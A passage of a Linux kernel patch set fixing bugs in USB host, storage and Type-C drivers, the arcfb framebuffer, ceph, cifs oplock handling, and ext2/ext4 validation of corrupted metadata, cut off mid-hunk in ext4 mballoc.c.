+diff --git a/drivers/usb/host/xhci-ring.c b/drivers/usb/host/xhci-ring.c
+index dce02d0aad8d0..7a7ab525675b7 100644
+--- a/drivers/usb/host/xhci-ring.c
++++ b/drivers/usb/host/xhci-ring.c
+@@ -276,6 +276,26 @@ static void inc_enq(struct xhci_hcd *xhci, struct xhci_ring *ring,
+ 	trace_xhci_inc_enq(ring);
+ }
+ 
++static int xhci_num_trbs_to(struct xhci_segment *start_seg, union xhci_trb *start,
++			    struct xhci_segment *end_seg, union xhci_trb *end,
++			    unsigned int num_segs)
++{
++	union xhci_trb *last_on_seg;
++	int num = 0;
++	int i = 0;
++
++	do {
++		if (start_seg == end_seg && end >= start)
++			return num + (end - start);
++		last_on_seg = &start_seg->trbs[TRBS_PER_SEGMENT - 1];
++		num += last_on_seg - start;
++		start_seg = start_seg->next;
++		start = start_seg->trbs;
++	} while (i++ <= num_segs);
++
++	return -EINVAL;
++}
++
+ /*
+  * Check to see if there's room to enqueue num_trbs on the ring and make sure
+  * enqueue pointer will not advance into dequeue segment. See rules above.
+@@ -2141,6 +2161,7 @@ static int finish_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 		     u32 trb_comp_code)
+ {
+ 	struct xhci_ep_ctx *ep_ctx;
++	int trbs_freed;
+ 
+ 	ep_ctx = xhci_get_ep_ctx(xhci, ep->vdev->out_ctx, ep->ep_index);
+ 
+@@ -2212,9 +2233,15 @@ static int finish_td(struct xhci_hcd *xhci, struct xhci_virt_ep *ep,
+ 	}
+ 
+ 	/* Update ring dequeue pointer */
++	trbs_freed = xhci_num_trbs_to(ep_ring->deq_seg, ep_ring->dequeue,
++				      td->last_trb_seg, td->last_trb,
++				      ep_ring->num_segs);
++	if (trbs_freed < 0)
++		xhci_dbg(xhci, "Failed to count freed trbs at TD finish\n");
++	else
++		ep_ring->num_trbs_free += trbs_freed;
+ 	ep_ring->dequeue = td->last_trb;
+ 	ep_ring->deq_seg = td->last_trb_seg;
+-	ep_ring->num_trbs_free += td->num_trbs - 1;
+ 	inc_deq(xhci, ep_ring);
+ 
+ 	return xhci_td_cleanup(xhci, td, ep_ring, td->status);
+diff --git a/drivers/usb/host/xhci.h b/drivers/usb/host/xhci.h
+index dcee7f3207add..6348cacdc65ef 100644
+--- a/drivers/usb/host/xhci.h
++++ b/drivers/usb/host/xhci.h
+@@ -1895,7 +1895,7 @@ struct xhci_hcd {
+ #define XHCI_DISABLE_SPARSE	BIT_ULL(38)
+ #define XHCI_SG_TRB_CACHE_SIZE_QUIRK	BIT_ULL(39)
+ #define XHCI_NO_SOFT_RETRY	BIT_ULL(40)
+-#define XHCI_BROKEN_D3COLD	BIT_ULL(41)
++#define XHCI_BROKEN_D3COLD_S2I	BIT_ULL(41)
+ #define XHCI_EP_CTX_BROKEN_DCS	BIT_ULL(42)
+ #define XHCI_SUSPEND_RESUME_CLKS	BIT_ULL(43)
+ #define XHCI_RESET_TO_DEFAULT	BIT_ULL(44)
+diff --git a/drivers/usb/storage/scsiglue.c b/drivers/usb/storage/scsiglue.c
+index 8931df5a85fd9..c54e9805da536 100644
+--- a/drivers/usb/storage/scsiglue.c
++++ b/drivers/usb/storage/scsiglue.c
+@@ -406,22 +406,25 @@ static DEF_SCSI_QCMD(queuecommand)
+  ***********************************************************************/
+ 
+ /* Command timeout and abort */
+-static int command_abort(struct scsi_cmnd *srb)
++static int command_abort_matching(struct us_data *us, struct scsi_cmnd *srb_match)
+ {
+-	struct us_data *us = host_to_us(srb->device->host);
+-
+-	usb_stor_dbg(us, "%s called\n", __func__);
+-
+ 	/*
+ 	 * us->srb together with the TIMED_OUT, RESETTING, and ABORTING
+ 	 * bits are protected by the host lock.
+ 	 */
+ 	scsi_lock(us_to_host(us));
+ 
+-	/* Is this command still active? */
+-	if (us->srb != srb) {
++	/* is there any active pending command to abort ? */
++	if (!us->srb) {
+ 		scsi_unlock(us_to_host(us));
+ 		usb_stor_dbg(us, "-- nothing to abort\n");
++		return SUCCESS;
++	}
++
++	/* Does the command match the passed srb if any ? */
++	if (srb_match && us->srb != srb_match) {
++		scsi_unlock(us_to_host(us));
++		usb_stor_dbg(us, "-- pending command mismatch\n");
+ 		return FAILED;
+ 	}
+ 
+@@ -444,6 +447,14 @@ static int command_abort(struct scsi_cmnd *srb)
+ 	return SUCCESS;
+ }
+ 
++static int command_abort(struct scsi_cmnd *srb)
++{
++	struct us_data *us = host_to_us(srb->device->host);
++
++	usb_stor_dbg(us, "%s called\n", __func__);
++	return command_abort_matching(us, srb);
++}
++
+ /*
+  * This invokes the transport reset mechanism to reset the state of the
+  * device
+@@ -455,6 +466,9 @@ static int device_reset(struct scsi_cmnd *srb)
+ 
+ 	usb_stor_dbg(us, "%s called\n", __func__);
+ 
++	/* abort any pending command before reset */
++	command_abort_matching(us, NULL);
++
+ 	/* lock the device pointers and do the reset */
+ 	mutex_lock(&(us->dev_mutex));
+ 	result = us->transport_reset(us);
+diff --git a/drivers/usb/typec/altmodes/displayport.c b/drivers/usb/typec/altmodes/displayport.c
+index 4075c0d7e6a2c..7cdf83f4c811b 100644
+--- a/drivers/usb/typec/altmodes/displayport.c
++++ b/drivers/usb/typec/altmodes/displayport.c
+@@ -513,6 +513,10 @@ static ssize_t pin_assignment_show(struct device *dev,
+ 
+ 	mutex_unlock(&dp->lock);
+ 
++	/* get_current_pin_assignments can return 0 when no matching pin assignments are found */
++	if (len == 0)
++		len++;
++
+ 	buf[len - 1] = '\n';
+ 	return len;
+ }
+diff --git a/drivers/usb/typec/tcpm/tcpm.c b/drivers/usb/typec/tcpm/tcpm.c
+index 032d21a967799..524099634a1d4 100644
+--- a/drivers/usb/typec/tcpm/tcpm.c
++++ b/drivers/usb/typec/tcpm/tcpm.c
+@@ -1514,7 +1514,21 @@ static bool svdm_consume_svids(struct tcpm_port *port, const u32 *p, int cnt)
+ 		pmdata->svids[pmdata->nsvids++] = svid;
+ 		tcpm_log(port, "SVID %d: 0x%x", pmdata->nsvids, svid);
+ 	}
+-	return true;
++
++	/*
++	 * PD3.0 Spec 6.4.4.3.2: The SVIDs are returned 2 per VDO (see Table
++	 * 6-43), and can be returned maximum 6 VDOs per response (see Figure
++	 * 6-19). If the Respondersupports 12 or more SVID then the Discover
++	 * SVIDs Command Shall be executed multiple times until a Discover
++	 * SVIDs VDO is returned ending either with a SVID value of 0x0000 in
++	 * the last part of the last VDO or with a VDO containing two SVIDs
++	 * with values of 0x0000.
++	 *
++	 * However, some odd dockers support SVIDs less than 12 but without
++	 * 0x0000 in the last VDO, so we need to break the Discover SVIDs
++	 * request and return false here.
++	 */
++	return cnt == 7;
+ abort:
+ 	tcpm_log(port, "SVID_DISCOVERY_MAX(%d) too low!", SVID_DISCOVERY_MAX);
+ 	return false;
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 62206a6b8ea75..217355f1f9b94 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -9,6 +9,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/module.h>
+ #include <linux/acpi.h>
++#include <linux/dmi.h>
+ 
+ #include "ucsi.h"
+ 
+@@ -23,6 +24,7 @@ struct ucsi_acpi {
+ 	struct completion complete;
+ 	unsigned long flags;
+ 	guid_t guid;
++	u64 cmd;
+ };
+ 
+ static int ucsi_acpi_dsm(struct ucsi_acpi *ua, int func)
+@@ -62,6 +64,7 @@ static int ucsi_acpi_async_write(struct ucsi *ucsi, unsigned int offset,
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
+ 
+ 	memcpy(ua->base + offset, val, val_len);
++	ua->cmd = *(u64 *)val;
+ 
+ 	return ucsi_acpi_dsm(ua, UCSI_DSM_FUNC_WRITE);
+ }
+@@ -93,13 +96,46 @@ static const struct ucsi_operations ucsi_acpi_ops = {
+ 	.async_write = ucsi_acpi_async_write
+ };
+ 
++static int
++ucsi_zenbook_read(struct ucsi *ucsi, unsigned int offset, void *val, size_t val_len)
++{
++	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
++	int ret;
++
++	if (offset == UCSI_VERSION || UCSI_COMMAND(ua->cmd) == UCSI_PPM_RESET) {
++		ret = ucsi_acpi_dsm(ua, UCSI_DSM_FUNC_READ);
++		if (ret)
++			return ret;
++	}
++
++	memcpy(val, ua->base + offset, val_len);
++
++	return 0;
++}
++
++static const struct ucsi_operations ucsi_zenbook_ops = {
++	.read = ucsi_zenbook_read,
++	.sync_write = ucsi_acpi_sync_write,
++	.async_write = ucsi_acpi_async_write
++};
++
++static const struct dmi_system_id zenbook_dmi_id[] = {
++	{
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "ZenBook UX325UA_UM325UA"),
++		},
++	},
++	{ }
++};
++
+ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ {
+ 	struct ucsi_acpi *ua = data;
+ 	u32 cci;
+ 	int ret;
+ 
+-	ret = ucsi_acpi_read(ua->ucsi, UCSI_CCI, &cci, sizeof(cci));
++	ret = ua->ucsi->ops->read(ua->ucsi, UCSI_CCI, &cci, sizeof(cci));
+ 	if (ret)
+ 		return;
+ 
+@@ -114,6 +150,7 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ static int ucsi_acpi_probe(struct platform_device *pdev)
+ {
+ 	struct acpi_device *adev = ACPI_COMPANION(&pdev->dev);
++	const struct ucsi_operations *ops = &ucsi_acpi_ops;
+ 	struct ucsi_acpi *ua;
+ 	struct resource *res;
+ 	acpi_status status;
+@@ -143,7 +180,10 @@ static int ucsi_acpi_probe(struct platform_device *pdev)
+ 	init_completion(&ua->complete);
+ 	ua->dev = &pdev->dev;
+ 
+-	ua->ucsi = ucsi_create(&pdev->dev, &ucsi_acpi_ops);
++	if (dmi_check_system(zenbook_dmi_id))
++		ops = &ucsi_zenbook_ops;
++
++	ua->ucsi = ucsi_create(&pdev->dev, ops);
+ 	if (IS_ERR(ua->ucsi))
+ 		return PTR_ERR(ua->ucsi);
+ 
+diff --git a/drivers/video/fbdev/arcfb.c b/drivers/video/fbdev/arcfb.c
+index 45e64016db328..024d0ee4f04f9 100644
+--- a/drivers/video/fbdev/arcfb.c
++++ b/drivers/video/fbdev/arcfb.c
+@@ -523,7 +523,7 @@ static int arcfb_probe(struct platform_device *dev)
+ 
+ 	info = framebuffer_alloc(sizeof(struct arcfb_par), &dev->dev);
+ 	if (!info)
+-		goto err;
++		goto err_fb_alloc;
+ 
+ 	info->screen_base = (char __iomem *)videomemory;
+ 	info->fbops = &arcfb_ops;
+@@ -535,7 +535,7 @@ static int arcfb_probe(struct platform_device *dev)
+ 
+ 	if (!dio_addr || !cio_addr || !c2io_addr) {
+ 		printk(KERN_WARNING "no IO addresses supplied\n");
+-		goto err1;
++		goto err_addr;
+ 	}
+ 	par->dio_addr = dio_addr;
+ 	par->cio_addr = cio_addr;
+@@ -551,12 +551,12 @@ static int arcfb_probe(struct platform_device *dev)
+ 			printk(KERN_INFO
+ 				"arcfb: Failed req IRQ %d\n", par->irq);
+ 			retval = -EBUSY;
+-			goto err1;
++			goto err_addr;
+ 		}
+ 	}
+ 	retval = register_framebuffer(info);
+ 	if (retval < 0)
+-		goto err1;
++		goto err_register_fb;
+ 	platform_set_drvdata(dev, info);
+ 	fb_info(info, "Arc frame buffer device, using %dK of video memory\n",
+ 		videomemorysize >> 10);
+@@ -580,9 +580,12 @@ static int arcfb_probe(struct platform_device *dev)
+ 	}
+ 
+ 	return 0;
+-err1:
++
++err_register_fb:
++	free_irq(par->irq, info);
++err_addr:
+ 	framebuffer_release(info);
+-err:
++err_fb_alloc:
+ 	vfree(videomemory);
+ 	return retval;
+ }
+diff --git a/fs/ceph/snap.c b/fs/ceph/snap.c
+index 87007203f130e..0b236ebd989fc 100644
+--- a/fs/ceph/snap.c
++++ b/fs/ceph/snap.c
+@@ -1111,6 +1111,19 @@ skip_inode:
+ 				continue;
+ 			adjust_snap_realm_parent(mdsc, child, realm->ino);
+ 		}
++	} else {
++		/*
++		 * In the non-split case both 'num_split_inos' and
++		 * 'num_split_realms' should be 0, making this a no-op.
++		 * However the MDS happens to populate 'split_realms' list
++		 * in one of the UPDATE op cases by mistake.
++		 *
++		 * Skip both lists just in case to ensure that 'p' is
++		 * positioned at the start of realm info, as expected by
++		 * ceph_update_snap_trace().
++		 */
++		p += sizeof(u64) * num_split_inos;
++		p += sizeof(u64) * num_split_realms;
+ 	}
+ 
+ 	/*
+diff --git a/fs/cifs/cifsglob.h b/fs/cifs/cifsglob.h
+index 157d3c0e3cc76..6ec1a34738e27 100644
+--- a/fs/cifs/cifsglob.h
++++ b/fs/cifs/cifsglob.h
+@@ -428,8 +428,8 @@ struct smb_version_operations {
+ 	/* check for STATUS_NETWORK_SESSION_EXPIRED */
+ 	bool (*is_session_expired)(char *);
+ 	/* send oplock break response */
+-	int (*oplock_response)(struct cifs_tcon *, struct cifs_fid *,
+-			       struct cifsInodeInfo *);
++	int (*oplock_response)(struct cifs_tcon *tcon, __u64 persistent_fid, __u64 volatile_fid,
++			__u16 net_fid, struct cifsInodeInfo *cifs_inode);
+ 	/* query remote filesystem */
+ 	int (*queryfs)(const unsigned int, struct cifs_tcon *,
+ 		       struct cifs_sb_info *, struct kstatfs *);
+diff --git a/fs/cifs/file.c b/fs/cifs/file.c
+index 158a0a5f40071..9a4c33ffb75fa 100644
+--- a/fs/cifs/file.c
++++ b/fs/cifs/file.c
+@@ -5086,9 +5086,9 @@ void cifs_oplock_break(struct work_struct *work)
+ 	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+ 	struct TCP_Server_Info *server = tcon->ses->server;
+ 	int rc = 0;
+-	bool purge_cache = false;
+-	struct cifs_deferred_close *dclose;
+-	bool is_deferred = false;
++	bool purge_cache = false, oplock_break_cancelled;
++	__u64 persistent_fid, volatile_fid;
++	__u16 net_fid;
+ 
+ 	wait_on_bit(&cinode->flags, CIFS_INODE_PENDING_WRITERS,
+ 			TASK_UNINTERRUPTIBLE);
+@@ -5129,28 +5129,28 @@ oplock_break_ack:
+ 	 * file handles but cached, then schedule deferred close immediately.
+ 	 * So, new open will not use cached handle.
+ 	 */
+-	spin_lock(&CIFS_I(inode)->deferred_lock);
+-	is_deferred = cifs_is_deferred_close(cfile, &dclose);
+-	spin_unlock(&CIFS_I(inode)->deferred_lock);
+ 
+-	if (!CIFS_CACHE_HANDLE(cinode) && is_deferred &&
+-			cfile->deferred_close_scheduled && delayed_work_pending(&cfile->deferred)) {
++	if (!CIFS_CACHE_HANDLE(cinode) && !list_empty(&cinode->deferred_closes))
+ 		cifs_close_deferred_file(cinode);
+-	}
+ 
++	persistent_fid = cfile->fid.persistent_fid;
++	volatile_fid = cfile->fid.volatile_fid;
++	net_fid = cfile->fid.netfid;
++	oplock_break_cancelled = cfile->oplock_break_cancelled;
++
++	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	/*
+ 	 * releasing stale oplock after recent reconnect of smb session using
+ 	 * a now incorrect file handle is not a data integrity issue but do
+ 	 * not bother sending an oplock release if session to server still is
+ 	 * disconnected since oplock already released by the server
+ 	 */
+-	if (!cfile->oplock_break_cancelled) {
+-		rc = tcon->ses->server->ops->oplock_response(tcon, &cfile->fid,
+-							     cinode);
++	if (!oplock_break_cancelled) {
++		rc = tcon->ses->server->ops->oplock_response(tcon, persistent_fid,
++				volatile_fid, net_fid, cinode);
+ 		cifs_dbg(FYI, "Oplock release rc = %d\n", rc);
+ 	}
+ 
+-	_cifsFileInfo_put(cfile, false /* do not wait for ourself */, false);
+ 	cifs_done_oplock_break(cinode);
+ }
+ 
+diff --git a/fs/cifs/smb1ops.c b/fs/cifs/smb1ops.c
+index abda6148be10f..7d1b3fc014d94 100644
+--- a/fs/cifs/smb1ops.c
++++ b/fs/cifs/smb1ops.c
+@@ -897,12 +897,11 @@ cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+ }
+ 
+ static int
+-cifs_oplock_response(struct cifs_tcon *tcon, struct cifs_fid *fid,
+-		     struct cifsInodeInfo *cinode)
++cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+ {
+-	return CIFSSMBLock(0, tcon, fid->netfid, current->tgid, 0, 0, 0, 0,
+-			   LOCKING_ANDX_OPLOCK_RELEASE, false,
+-			   CIFS_CACHE_READ(cinode) ? 1 : 0);
++	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
++			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
+ }
+ 
+ static int
+diff --git a/fs/cifs/smb2ops.c b/fs/cifs/smb2ops.c
+index 7468f8baf4990..d512440d35b6f 100644
+--- a/fs/cifs/smb2ops.c
++++ b/fs/cifs/smb2ops.c
+@@ -2383,15 +2383,14 @@ smb2_is_network_name_deleted(char *buf, struct TCP_Server_Info *server)
+ }
+ 
+ static int
+-smb2_oplock_response(struct cifs_tcon *tcon, struct cifs_fid *fid,
+-		     struct cifsInodeInfo *cinode)
++smb2_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
++		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+ {
+ 	if (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LEASING)
+ 		return SMB2_lease_break(0, tcon, cinode->lease_key,
+ 					smb2_get_lease_state(cinode));
+ 
+-	return SMB2_oplock_break(0, tcon, fid->persistent_fid,
+-				 fid->volatile_fid,
++	return SMB2_oplock_break(0, tcon, persistent_fid, volatile_fid,
+ 				 CIFS_CACHE_READ(cinode) ? 1 : 0);
+ }
+ 
+diff --git a/fs/ext2/ext2.h b/fs/ext2/ext2.h
+index 28de11a22e5f6..dc5dcb78bc27f 100644
+--- a/fs/ext2/ext2.h
++++ b/fs/ext2/ext2.h
+@@ -180,6 +180,7 @@ static inline struct ext2_sb_info *EXT2_SB(struct super_block *sb)
+ #define EXT2_MIN_BLOCK_SIZE		1024
+ #define	EXT2_MAX_BLOCK_SIZE		4096
+ #define EXT2_MIN_BLOCK_LOG_SIZE		  10
++#define EXT2_MAX_BLOCK_LOG_SIZE		  16
+ #define EXT2_BLOCK_SIZE(s)		((s)->s_blocksize)
+ #define	EXT2_ADDR_PER_BLOCK(s)		(EXT2_BLOCK_SIZE(s) / sizeof (__u32))
+ #define EXT2_BLOCK_SIZE_BITS(s)		((s)->s_blocksize_bits)
+diff --git a/fs/ext2/super.c b/fs/ext2/super.c
+index 03f2af98b1b48..3feea4b31fa7e 100644
+--- a/fs/ext2/super.c
++++ b/fs/ext2/super.c
+@@ -945,6 +945,13 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		goto failed_mount;
+ 	}
+ 
++	if (le32_to_cpu(es->s_log_block_size) >
++	    (EXT2_MAX_BLOCK_LOG_SIZE - BLOCK_SIZE_BITS)) {
++		ext2_msg(sb, KERN_ERR,
++			 "Invalid log block size: %u",
++			 le32_to_cpu(es->s_log_block_size));
++		goto failed_mount;
++	}
+ 	blocksize = BLOCK_SIZE << le32_to_cpu(sbi->s_es->s_log_block_size);
+ 
+ 	if (test_opt(sb, DAX)) {
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index f2c415f31b755..a38aa33af08ef 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -319,6 +319,22 @@ static ext4_fsblk_t ext4_valid_block_bitmap_padding(struct super_block *sb,
+ 	return (next_zero_bit < bitmap_size ? next_zero_bit : 0);
+ }
+ 
++struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
++					    ext4_group_t group)
++{
++	 struct ext4_group_info **grp_info;
++	 long indexv, indexh;
++
++	 if (unlikely(group >= EXT4_SB(sb)->s_groups_count)) {
++		 ext4_error(sb, "invalid group %u", group);
++		 return NULL;
++	 }
++	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
++	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
++	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
++	 return grp_info[indexh];
++}
++
+ /*
+  * Return the block number which was discovered to be invalid, or 0 if
+  * the block bitmap is valid.
+@@ -393,7 +409,7 @@ static int ext4_validate_block_bitmap(struct super_block *sb,
+ 
+ 	if (buffer_verified(bh))
+ 		return 0;
+-	if (EXT4_MB_GRP_BBITMAP_CORRUPT(grp))
++	if (!grp || EXT4_MB_GRP_BBITMAP_CORRUPT(grp))
+ 		return -EFSCORRUPTED;
+ 
+ 	ext4_lock_group(sb, block_group);
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index a2bc440743ae4..2156d2a1a7700 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -2716,6 +2716,8 @@ extern void ext4_check_blocks_bitmap(struct super_block *);
+ extern struct ext4_group_desc * ext4_get_group_desc(struct super_block * sb,
+ 						    ext4_group_t block_group,
+ 						    struct buffer_head ** bh);
++extern struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
++						   ext4_group_t group);
+ extern int ext4_should_retry_alloc(struct super_block *sb, int *retries);
+ 
+ extern struct buffer_head *ext4_read_block_bitmap_nowait(struct super_block *sb,
+@@ -3322,19 +3324,6 @@ static inline void ext4_isize_set(struct ext4_inode *raw_inode, loff_t i_size)
+ 	raw_inode->i_size_high = cpu_to_le32(i_size >> 32);
+ }
+ 
+-static inline
+-struct ext4_group_info *ext4_get_group_info(struct super_block *sb,
+-					    ext4_group_t group)
+-{
+-	 struct ext4_group_info **grp_info;
+-	 long indexv, indexh;
+-	 BUG_ON(group >= EXT4_SB(sb)->s_groups_count);
+-	 indexv = group >> (EXT4_DESC_PER_BLOCK_BITS(sb));
+-	 indexh = group & ((EXT4_DESC_PER_BLOCK(sb)) - 1);
+-	 grp_info = sbi_array_rcu_deref(EXT4_SB(sb), s_group_info, indexv);
+-	 return grp_info[indexh];
+-}
+-
+ /*
+  * Reading s_groups_count requires using smp_rmb() afterwards.  See
+  * the locking protocol documented in the comments of ext4_group_add()
+diff --git a/fs/ext4/ialloc.c b/fs/ext4/ialloc.c
+index e9bc46684106b..e09c74927a430 100644
+--- a/fs/ext4/ialloc.c
++++ b/fs/ext4/ialloc.c
+@@ -91,7 +91,7 @@ static int ext4_validate_inode_bitmap(struct super_block *sb,
+ 
+ 	if (buffer_verified(bh))
+ 		return 0;
+-	if (EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
++	if (!grp || EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
+ 		return -EFSCORRUPTED;
+ 
+ 	ext4_lock_group(sb, block_group);
+@@ -293,7 +293,7 @@ void ext4_free_inode(handle_t *handle, struct inode *inode)
+ 	}
+ 	if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+ 		grp = ext4_get_group_info(sb, block_group);
+-		if (unlikely(EXT4_MB_GRP_IBITMAP_CORRUPT(grp))) {
++		if (!grp || unlikely(EXT4_MB_GRP_IBITMAP_CORRUPT(grp))) {
+ 			fatal = -EFSCORRUPTED;
+ 			goto error_return;
+ 		}
+@@ -1047,7 +1047,7 @@ got_group:
+ 			 * Skip groups with already-known suspicious inode
+ 			 * tables
+ 			 */
+-			if (EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
++			if (!grp || EXT4_MB_GRP_IBITMAP_CORRUPT(grp))
+ 				goto next_group;
+ 		}
+ 
+@@ -1185,6 +1185,10 @@ got:
+ 
+ 		if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+ 			grp = ext4_get_group_info(sb, group);
++			if (!grp) {
++				err = -EFSCORRUPTED;
++				goto out;
++			}
+ 			down_read(&grp->alloc_sem); /*
+ 						     * protect vs itable
+ 						     * lazyinit
+@@ -1528,7 +1532,7 @@ int ext4_init_inode_table(struct super_block *sb, ext4_group_t group,
+ 	}
+ 
+ 	gdp = ext4_get_group_desc(sb, group, &group_desc_bh);
+-	if (!gdp)
++	if (!gdp || !grp)
+ 		goto out;
+ 
+ 	/*
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 912c4a1093fe5..32d88757a780e 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -745,6 +745,8 @@ static int __mb_check_buddy(struct ext4_buddy *e4b, char *file,
+ 	MB_CHECK_ASSERT(e4b->bd_info->bb_fragments == fragments);
+ 
+ 	grp = ext4_get_group_info(sb, e4b->bd_group);
++	if (!grp)
++		return NULL;
+ 	list_for_each(cur, &grp->bb_prealloc_list) {
+ 		ext4_group_t groupnr;
+ 		struct ext4_prealloc_space *pa;
+@@ -1060,9 +1062,9 @@ mb_set_largest_free_order(struct super_block *sb, struct ext4_group_info *grp)
+ 
+ static noinline_for_stack
+ void ext4_mb_generate_buddy(struct super_block *sb,
+-				void *buddy, void *bitmap, ext4_group_t group)
++			    void *buddy, void *bitmap, ext4_group_t group,
++			    struct ext4_group_info *grp)
+ {
+-	struct ext4_group_info *grp = ext4_get_group_info(sb, group);
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	ext4_grpblk_t max = EXT4_CLUSTERS_PER_GROUP(sb);
+ 	ext4_grpblk_t i = 0;
+@@ -1183,6 +1185,8 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 			break;
+ 
+ 		grinfo = ext4_get_group_info(sb, group);
++		if (!grinfo)
++			continue;
+ 		/*
+ 		 * If page is uptodate then we came here after online resize
+ 		 * which added some new uninitialized group info structs, so
+@@ -1248,6 +1252,10 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 				group, page->index, i * blocksize);
+ 			trace_ext4_mb_buddy_bitmap_load(sb, group);
+ 			grinfo = ext4_get_group_info(sb, group);
++			if (!grinfo) {
++				err = -EFSCORRUPTED;
++				goto out;
++			}
+ 			grinfo->bb_fragments = 0;
+ 			memset(grinfo->bb_counters, 0,
+ 			       sizeof(*grinfo->bb_counters) *
+@@ -1258,7 +1266,7 @@ static int ext4_mb_init_cache(struct page *page, char *incore, gfp_t gfp)
+ 			ext4_lock_group(sb, group);
+ 			/* init the buddy */
+ 			memset(data, 0xff, blocksize);
+-			ext4_mb_generate_buddy(sb, data, incore, group);
++			ext4_mb_generate_buddy(sb, data, incore, group, grinfo);
+ 			ext4_unlock_group(sb, group);
+ 			incore = NULL;
+ 		} else {
+@@ -1372,6 +1380,9 @@ int ext4_mb_init_group(struct super_block *sb, ext4_group_t group, gfp_t gfp)
+ 	might_sleep();
+ 	mb_debug(sb, "init group %u\n", group);
+ 	this_grp = ext4_get_group_info(sb, group);
++	if (!this_grp)
++		return -EFSCORRUPTED;
++
+ 	/*
+ 	 * This ensures that we don't reinit the buddy cache
+ 	 * page which map to the group from which we are already
+@@ -1446,6 +1457,8 @@ ext4_mb_load_buddy_gfp(struct super_block *sb, ext4_group_t group,
+ 
+ 	blocks_per_page = PAGE_SIZE / sb->s_blocksize;
+ 	grp = ext4_get_group_info(sb, group);
++	if (!grp)
++		return -EFSCORRUPTED;
+ 
+ 	e4b->bd_blkbits = sb->s_blocksize_bits;
+ 	e4b->bd_info = grp;
+@@ -2162,7 +2175,9 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	struct ext4_group_info *grp = ext4_get_group_info(ac->ac_sb, group);
+ 	struct ext4_free_extent ex;
+ 
+-	if (!(ac->ac_flags & EXT4_MB_HINT_TRY_GOAL))
++	if (!grp)
++		return -EFSCORRUPTED;
++	if (!(ac->ac_flags & (EXT4_MB_HINT_TRY_GOAL | EXT4_MB_HINT_GOAL_ONLY)))
+ 		return 0;
+ 	if (grp->bb_free == 0)
+ 		return 0;
+@@ -2386,7 +2401,7 @@ static bool ext4_mb_good_group(struct ext4_allocation_context *ac,
+ 
+ 	BUG_ON(cr < 0 || cr >= 4);
+ 
+-	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp)))
++	if (unlikely(EXT4_MB_GRP_BBITMAP_CORRUPT(grp) || !grp))
+ 		return false;
+ 
+ 	free = grp->bb_free;
+@@ -2455,6 +2470,8 @@ static int ext4_mb_good_group_nolock(struct ext4_allocation_context *ac,
+ 	ext4_grpblk_t free;
+ 	int ret = 0;
+ 
++	if (!grp)
++		return -EFSCORRUPTED;
+ 	if (sbi->s_mb_stats)
+ 		atomic64_inc(&sbi->s_bal_cX_groups_considered[ac->ac_criteria]);
+ 	if (should_lock) {
+@@ -2535,7 +2552,7 @@ ext4_group_t ext4_mb_prefetch(struct super_block *sb, ext4_group_t group,
+ 		 * prefetch once, so we avoid getblk() call, which can
+ 		 * be expensive.
+ 		 */
+-		if (!EXT4_MB_GRP_TEST_AND_SET_READ(grp) &&
++		if (gdp && grp && !EXT4_MB_GRP_TEST_AND_SET_READ(grp) &&
+ 		    EXT4_MB_GRP_NEED_INIT(grp) &&
+ 		    ext4_free_group_clusters(sb, gdp) > 0 &&
+ 		    !(ext4_has_group_desc_csum(sb) &&
+@@ -2579,7 +2596,7 @@ void ext4_mb_prefetch_fini(struct super_block *sb, ext4_group_t group,
+ 		group--;
+ 		grp = ext4_get_group_info(sb, group);
+ 
+-		if (EXT4_MB_GRP_NEED_INIT(grp) &&
++		if (grp && gdp && EXT4_MB_GRP_NEED_INIT(grp) &&
+ 		    ext4_free_group_clusters(sb, gdp) > 0 &&
+ 		    !(ext4_has_group_desc_csum(sb) &&
